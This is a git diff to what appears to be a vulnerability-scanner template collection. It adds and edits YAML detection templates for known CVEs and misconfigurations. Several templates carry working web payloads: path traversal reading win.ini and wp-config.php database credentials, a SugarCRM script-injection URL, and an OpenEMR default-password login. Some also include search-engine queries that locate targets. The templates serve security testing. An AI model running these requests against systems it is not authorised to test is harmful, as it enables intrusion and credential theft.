diff --git a/.new-additions b/.new-additions
index 21e6e91b9f..f460e333fc 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,5 @@
+cves/2010/CVE-2010-4239.yaml
+cves/2018/CVE-2018-5715.yaml
cves/2019/CVE-2019-16996.yaml
cves/2021/CVE-2021-44077.yaml
cves/2021/CVE-2021-44515.yaml
@@ -6,9 +8,15 @@ cves/2022/CVE-2022-0208.yaml
cves/2022/CVE-2022-0595.yaml
cves/2022/CVE-2022-1020.yaml
cves/2022/CVE-2022-1054.yaml
+cves/2022/CVE-2022-1119.yaml
cves/2022/CVE-2022-27849.yaml
+default-logins/openemr/openemr-default-login.yaml
+exposed-panels/synapse-mobility-panel.yaml
+exposures/configs/azure-domain-tenant.yaml
exposures/configs/webpack-config.yaml
exposures/files/readme-md.yaml
+miscellaneous/firebase-database-extractor.yaml
+technologies/microsoft/microsoft-sharepoint-detect.yaml
token-spray/api-hirak-rates.yaml
vulnerabilities/other/WSO2-2019-0598.yaml
vulnerabilities/other/avada-xss.yaml
diff --git a/cves/2010/CVE-2010-4239.yaml b/cves/2010/CVE-2010-4239.yaml
new file mode 100644
index 0000000000..6f3303143c
--- /dev/null
+++ b/cves/2010/CVE-2010-4239.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-4239
+
+info:
+ name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
+ author: 0x_akoko
+ severity: high
+ description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
+ reference:
+ - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
+ - https://www.cvedetails.com/cve/CVE-2010-4239
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2010-4239
+ cwe-id: CWE-20
+ tags: cve,cve2010,tikiwiki,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml
index 787ed1aa4c..ba3b0c90c9 100644
--- a/cves/2016/CVE-2016-3088.yaml
+++ b/cves/2016/CVE-2016-3088.yaml
@@ -1,10 +1,10 @@
id: CVE-2016-3088
info:
- name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
+ name: Apache ActiveMQ Fileserver - Arbitrary File Write
author: fq_hsu
severity: critical
- description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
+ description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
@@ -38,3 +38,5 @@ requests:
- "status_code_2==200"
- "contains((body_2), '{{randstr}}')"
condition: and
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml
index bc85b11ea6..81c40dce42 100644
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@@ -1,7 +1,7 @@
id: CVE-2018-15961
info:
- name: Adobe ColdFusion Unrestricted File Upload RCE
+ name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
author: SkyLark-Lab,ImNightmaree
severity: critical
description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
@@ -63,3 +63,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2018/CVE-2018-5715.yaml b/cves/2018/CVE-2018-5715.yaml
new file mode 100644
index 0000000000..40451b7b2c
--- /dev/null
+++ b/cves/2018/CVE-2018-5715.yaml
@@ -0,0 +1,40 @@
+id: CVE-2018-5715
+
+info:
+ name: SugarCRM 3.5.1 - Reflected XSS
+ author: edoardottt
+ severity: medium
+ description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
+ reference:
+ - https://www.exploit-db.com/exploits/43683
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-5715
+ metadata:
+ shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
+ google-dork: intext:"SugarCRM Inc. All Rights Reserved"
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-5715
+ cwe-id: CWE-79
+ tags: cve,cve2018,sugarcrm,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '&"/>=&"><< Back
'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml
index c44d757775..90f7adb2ad 100644
--- a/cves/2018/CVE-2018-7251.yaml
+++ b/cves/2018/CVE-2018-7251.yaml
@@ -1,16 +1,18 @@
id: CVE-2018-7251
info:
- name: AnchorCMS Error Log Exposure
+ name: Anchor CMS 0.12.3 - Error Log Exposure
author: pdteam
severity: critical
- description: An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
+ description: |
+ Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
reference:
- https://github.com/anchorcms/anchor-cms/issues/1247
- http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html
- https://twitter.com/finnwea/status/965279233030393856
- http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html
- https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-7251
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -29,3 +31,6 @@ requests:
- '"message":'
- '"trace":['
condition: and
+
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml
index b33e6468a6..55eec4cab2 100644
--- a/cves/2020/CVE-2020-16952.yaml
+++ b/cves/2020/CVE-2020-16952.yaml
@@ -5,35 +5,37 @@ info:
author: dwisiswant0
severity: high
description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'.
- This CVE ID is unique from CVE-2020-16951.
reference:
- - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://srcincite.io/pocs/cve-2020-16952.py.txt
+ - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2020-16952
cwe-id: CWE-346
- tags: cve,cve2020,sharepoint,iis,microsoft
+ tags: cve,cve2020,sharepoint,iis,microsoft,ssi,rce
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers-condition: and
matchers:
- type: regex
+ part: body
regex:
- "15\\.0\\.0\\.(4571|5275|4351|5056)"
- "16\\.0\\.0\\.(10337|10364|10366)"
# - "16.0.10364.20001"
condition: or
- part: body
- - type: word
- words:
- - "MicrosoftSharePointTeamServices"
+
+ - type: regex
part: header
+ regex:
+ - "(?i)(Microsoftsharepointteamservices:)"
+
- type: status
status:
- 200
diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml
index 2a9c1df03d..ab5b42a3f3 100644
--- a/cves/2020/CVE-2020-26214.yaml
+++ b/cves/2020/CVE-2020-26214.yaml
@@ -1,10 +1,10 @@
id: CVE-2020-26214
info:
- name: Alerta Authentication Bypass
+ name: Alerta < 8.1.0 - Authentication Bypass
author: CasperGN
severity: critical
- description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind requests.
+ description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.
reference:
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
@@ -43,4 +43,4 @@ requests:
regex:
- 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
-# Enhanced by mp on 2022/03/27
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml
index 51cda039a4..a999d024e3 100644
--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@@ -4,10 +4,10 @@ info:
name: ASUS GT-AC2900 - Authentication Bypass
author: gy741
severity: critical
- description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access
- to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
+ description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations."
reference:
- https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-32030
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -41,3 +41,5 @@ requests:
- "alias"
- "model_name"
condition: and
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml
index 039500eb30..4d9d7ce135 100644
--- a/cves/2021/CVE-2021-38540.yaml
+++ b/cves/2021/CVE-2021-38540.yaml
@@ -4,8 +4,8 @@ info:
name: Apache Airflow - Unauthenticated Variable Import
author: pdteam
severity: critical
- description: The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially
- resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.
+ description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.
+ remediation: Upgrade to Apache Airflow 2.1.3 or higher.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-38540
classification:
@@ -66,4 +66,7 @@ requests:
- type: word
words:
- - 'You should be redirected automatically to target URL: '
\ No newline at end of file
+ - 'You should be redirected automatically to target URL: '
+
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml
index 8265c912c4..f1609e03fa 100644
--- a/cves/2021/CVE-2021-40438.yaml
+++ b/cves/2021/CVE-2021-40438.yaml
@@ -4,7 +4,7 @@ info:
name: Apache <= 2.4.48 Mod_Proxy SSRF
author: pdteam
severity: critical
- description: Apache 2.4.8 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
+ description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
reference:
- https://firzen.de/building-a-poc-for-cve-2021-40438
- https://httpd.apache.org/security/vulnerabilities_24.html
@@ -14,7 +14,7 @@ info:
cvss-score: 9.0
cve-id: CVE-2021-40438
cwe-id: CWE-918
- remediation: Upgrade to Apache version 2.4.49 or newer.
+ remediation: Upgrade to Apache version 2.4.49 or later.
tags: cve,cve2021,ssrf,apache,mod-proxy
requests:
@@ -29,4 +29,5 @@ requests:
words:
- "Interactsh Server"
-# Enhanced by cs on 2022/02/22
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml
index 305ea625ba..923a8bce3e 100644
--- a/cves/2021/CVE-2021-42013.yaml
+++ b/cves/2021/CVE-2021-42013.yaml
@@ -4,10 +4,8 @@ info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
severity: critical
- description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
- If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations,
- for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for
- the original vulnerability CVE-2021-41773.
+ description: |
+ A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
@@ -50,4 +48,4 @@ requests:
words:
- "CVE-2021-42013"
-# Enhanced by mp on 2022/02/27
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-45232.yaml b/cves/2021/CVE-2021-45232.yaml
index 261659a370..954e3ae3d2 100644
--- a/cves/2021/CVE-2021-45232.yaml
+++ b/cves/2021/CVE-2021-45232.yaml
@@ -1,11 +1,10 @@
id: CVE-2021-45232
info:
- name: Apache APISIX Dashboard API Unauthorized Access
+ name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
author: Mr-xn
severity: critical
- description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed
- based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
+ description: "In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication."
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
@@ -36,4 +35,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2022/CVE-2022-1119.yaml b/cves/2022/CVE-2022-1119.yaml
new file mode 100644
index 0000000000..9655352d6d
--- /dev/null
+++ b/cves/2022/CVE-2022-1119.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-1119
+
+info:
+ name: WordPress Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download
+ author: random-robbie
+ severity: high
+ description: |
+ The plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-1119
+ - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
+ classification:
+ cve-id: CVE-2022-1119
+ cwe-id: CWE-552
+ tags: cve,cve2022,lfi,wordpress
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
index 105ffdbaa9..1284bb17a3 100644
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@@ -1,18 +1,15 @@
id: CVE-2022-24112
info:
- name: Apache APISIX apisix/batch-requests Remote Code Execution
+ name: Apache APISIX - Remote Code Execution
author: Mr-xn
severity: critical
- description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE.
- An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data
- panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote
- IP. But due to a bug in the code, this check can be bypassed.
+ description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
- https://www.openwall.com/lists/oss-security/2022/02/11/3
- https://twitter.com/sirifu4k1/status/1496043663704858625
- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -80,4 +77,4 @@ requests:
regex:
- 'GET \/([a-z-]+) HTTP'
-# Enhanced by mp on 2022/03/08
+# Enhanced by mp on 2022/04/22
diff --git a/default-logins/openemr/openemr-default-login.yaml b/default-logins/openemr/openemr-default-login.yaml
new file mode 100644
index 0000000000..5a08aa24f2
--- /dev/null
+++ b/default-logins/openemr/openemr-default-login.yaml
@@ -0,0 +1,46 @@
+id: openemr-default-login
+
+info:
+ name: OpenEMR Default Login
+ author: Geekby
+ description: OpenEMR default login was discovered.
+ severity: high
+ reference:
+ - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ fofa-query: app="OpenEMR"
+ shodan-query: http.html:"OpenEMR"
+ tags: openemr,default-login
+
+requests:
+ - raw:
+ - |
+ POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10
+
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ pass:
+ - pass
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "main.php?token_main="
+ - "OpenEMR"
+ condition: and
+
+ - type: status
+ status:
+ - 302
diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml
index 9461971d07..8d4edd872c 100644
--- a/exposed-panels/openemr-detect.yaml
+++ b/exposed-panels/openemr-detect.yaml
@@ -1,13 +1,14 @@
id: openemr-detect
-
+
info:
name: OpenEMR Product Detect
author: pussycat0x
severity: info
metadata:
- shodan-dork: 'app="OpenEMR"'
+ fofa-query: app="OpenEMR"
+ shodan-query: http.html:"OpenEMR"
tags: panel,openemr
-
+
requests:
- method: GET
path:
diff --git a/exposures/configs/azure-domain-tenant.yaml b/exposures/configs/azure-domain-tenant.yaml
new file mode 100644
index 0000000000..db427a99bb
--- /dev/null
+++ b/exposures/configs/azure-domain-tenant.yaml
@@ -0,0 +1,33 @@
+id: azure-domain-tenant
+
+info:
+ name: Microsoft Azure - Domain Tenant ID
+ author: V0idC0de
+ severity: info
+ description: Checks if the domain is part of an Azure tenant and finds the ID using Azure's OpenID discovery page.
+ tags: azure,microsoft,cloud
+
+
+requests:
+ - raw:
+ - |
+ @Host: https://login.microsoftonline.com:443
+ GET /{{Host}}/v2.0/.well-known/openid-configuration HTTP/1.1
+ Host: login.microsoftonline.com
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "token_endpoint"
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "\"https:\\/\\/login\\.microsoftonline\\.com\\/([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
diff --git a/miscellaneous/firebase-database-extractor.yaml b/miscellaneous/firebase-database-extractor.yaml
new file mode 100644
index 0000000000..3918a2a836
--- /dev/null
+++ b/miscellaneous/firebase-database-extractor.yaml
@@ -0,0 +1,20 @@
+id: firebase-database-extractor
+
+info:
+ name: Firebase Database Extract Check
+ author: rafaelwdornelas
+ severity: info
+ description: Extract Firebase Database
+ tags: firebase,misc
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[a-z0-9.-]+\\.firebaseio\\.com"
+ - "[a-z0-9.-]+\\.firebaseapp\\.com"
diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml
index 823bb90f3f..cdb6438ebc 100644
--- a/misconfiguration/aem/aem-crx-bypass.yaml
+++ b/misconfiguration/aem/aem-crx-bypass.yaml
@@ -1,12 +1,14 @@
id: aem-crx-bypass
info:
- name: AEM CRX Bypass
+ name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
+ description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
severity: critical
+ remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
- tags: aem
+ tags: aem,adobe
requests:
- raw:
@@ -40,3 +42,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml
index a2a388a6ec..2d05325869 100644
--- a/misconfiguration/aem/aem-groovyconsole.yaml
+++ b/misconfiguration/aem/aem-groovyconsole.yaml
@@ -1,14 +1,14 @@
id: aem-groovyconsole
info:
- name: AEM Groovy console enabled
+ name: AEM Groovy Console Discovery
author: Dheerajmadhukar
severity: critical
- description: Groovy console is exposed, RCE is possible.
+ description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution.
reference:
- https://hackerone.com/reports/672243
- https://twitter.com/XHackerx007/status/1435139576314671105
- tags: aem
+ tags: aem,adobe
requests:
- method: GET
@@ -32,4 +32,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/misconfiguration/proxy/metadata-alibaba.yaml b/misconfiguration/proxy/metadata-alibaba.yaml
index c49b80a4a4..fca319f76b 100644
--- a/misconfiguration/proxy/metadata-alibaba.yaml
+++ b/misconfiguration/proxy/metadata-alibaba.yaml
@@ -39,4 +39,5 @@ requests:
part: body
words:
- "zone-id"
-# Enhanced by cs on 2022/02/14
+
+# Enhanced by mp on 2022/04/22
diff --git a/misconfiguration/proxy/metadata-aws.yaml b/misconfiguration/proxy/metadata-aws.yaml
index f69bb60036..4f6f7d9b98 100644
--- a/misconfiguration/proxy/metadata-aws.yaml
+++ b/misconfiguration/proxy/metadata-aws.yaml
@@ -12,7 +12,7 @@ info:
name: Amazon AWS Metadata Service Check
author: sullo
severity: critical
- description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2.
+ description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
reference:
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
@@ -41,4 +41,5 @@ requests:
- "public-ipv4"
- "privateIp"
condition: or
-# Enhanced by cs on 2022/02/14
+
+# Enhanced by mp on 2022/04/22
diff --git a/technologies/microsoft/microsoft-sharepoint-detect.yaml b/technologies/microsoft/microsoft-sharepoint-detect.yaml
new file mode 100644
index 0000000000..7b5b50446f
--- /dev/null
+++ b/technologies/microsoft/microsoft-sharepoint-detect.yaml
@@ -0,0 +1,24 @@
+id: microsoft-sharepoint-detect
+
+info:
+ name: Microsoft SharePoint Detect
+ author: p-l-
+ severity: info
+ description: Check for SharePoint, using HTTP header MicrosoftSharePointTeamServices
+ tags: sharepoint,iis,microsoft,tech
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - "(?i)(Microsoftsharepointteamservices:)"
+
+ extractors:
+ - type: kval
+ kval:
+ - MicrosoftSharePointTeamServices
diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml
index 981dc2652b..27ea2ed01c 100644
--- a/vulnerabilities/other/antsword-backdoor.yaml
+++ b/vulnerabilities/other/antsword-backdoor.yaml
@@ -1,17 +1,17 @@
id: antsword-backdoor
info:
- name: Antsword Backdoor Identified
+ name: AntSword Backdoor Detection
author: ffffffff0x
severity: critical
- description: The Antsword application contains a backdoor shell.
+ description: An AntSword application backdoor shell was discovered.
reference:
- https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-553
- remediation: Reinstall Anstsword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.
+ remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.
tags: backdoor,antsword
requests:
@@ -33,4 +33,4 @@ requests:
status:
- 200
-# Enhanced by cs 2022/03/31
+# Enhanced by mp on 2022/04/22